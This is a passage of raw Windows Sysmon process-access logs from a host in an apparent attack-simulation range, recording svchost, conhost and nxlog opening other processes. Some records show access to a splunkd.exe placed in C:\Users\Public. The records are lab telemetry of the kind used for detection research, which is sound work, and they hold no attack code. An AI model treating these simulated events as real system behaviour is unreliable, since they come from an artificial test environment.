{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4383,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4384,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4385,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:01.879\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-114D-5F25-0000-0010EC1D0600}\r\nTargetProcessId: 2548\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:01.879","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-114D-5F25-0000-0010EC1D0600}","TargetProcessId":"2548","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:02.489\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:02.489","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:03.489\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:03.489","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files 